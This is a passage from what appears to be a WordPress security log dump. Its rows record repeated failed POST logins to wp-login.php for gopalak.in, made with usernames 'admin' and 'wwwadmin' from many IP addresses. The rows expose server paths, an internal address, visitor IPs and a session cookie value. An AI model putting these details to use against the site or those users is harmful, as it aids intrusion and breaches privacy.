Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40924\";s:11:\"REMOTE_ADDR\";s:13:\"104.43.93.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745681362.8763869;s:12:\"REQUEST_TIME\";i:1745681362;}}','104.43.93.163',0,'2025-04-26 20:59:24','1970-01-01 00:00:00'),(94329,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52756\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745681804.946265;s:12:\"REQUEST_TIME\";i:1745681804;}}','199.188.200.145',0,'2025-04-26 21:06:46','1970-01-01 00:00:00'),(94330,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35202\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745682239.7974391;s:12:\"REQUEST_TIME\";i:1745682239;}}','198.27.67.210',0,'2025-04-26 21:14:01','1970-01-01 00:00:00'),(94331,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60918\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745682677.4924769;s:12:\"REQUEST_TIME\";i:1745682677;}}','103.169.35.190',0,'2025-04-26 21:21:19','1970-01-01 00:00:00'),(94332,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42674\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745683119.2285631;s:12:\"REQUEST_TIME\";i:1745683119;}}','78.155.192.110',0,'2025-04-26 21:28:40','1970-01-01 00:00:00'),(94333,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45116\";s:11:\"REMOTE_ADDR\";s:15:\"135.148.137.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745683560.4694581;s:12:\"REQUEST_TIME\";i:1745683560;}}','135.148.137.109',0,'2025-04-26 21:36:02','1970-01-01 00:00:00'),(94334,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33322\";s:11:\"REMOTE_ADDR\";s:13:\"34.46.107.224\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745683996.2776589;s:12:\"REQUEST_TIME\";i:1745683996;}}','34.46.107.224',0,'2025-04-26 21:43:18','1970-01-01 00:00:00'),(94335,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35632\";s:11:\"REMOTE_ADDR\";s:13:\"52.21.209.231\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745684435.8264029;s:12:\"REQUEST_TIME\";i:1745684435;}}','52.21.209.231',0,'2025-04-26 21:50:37','1970-01-01 00:00:00'),(94336,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"5274\";s:11:\"REMOTE_ADDR\";s:13:\"83.149.93.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745684869.151922;s:12:\"REQUEST_TIME\";i:1745684869;}}','83.149.93.194',0,'2025-04-26 21:57:51','1970-01-01 00:00:00'),(94337,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48550\";s:11:\"REMOTE_ADDR\";s:12:\"74.50.95.214\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745685294.8092451;s:12:\"REQUEST_TIME\";i:1745685294;}}','74.50.95.214',0,'2025-04-26 22:04:56','1970-01-01 00:00:00'),(94338,0,'a:2:{s:8:\"username\";s:8:\"wwwadmin\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=170d165be6ad60e4b8aaacf53a864ce6; _uid=rB8jg2gNC4qamzt9A24FAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48576\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.235.199\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745685386.45632;s:12:\"REQUEST_TIME\";i:1745685386;}}','103.90.235.199',0,'2025-04-26 22:06:28','1970-01-01 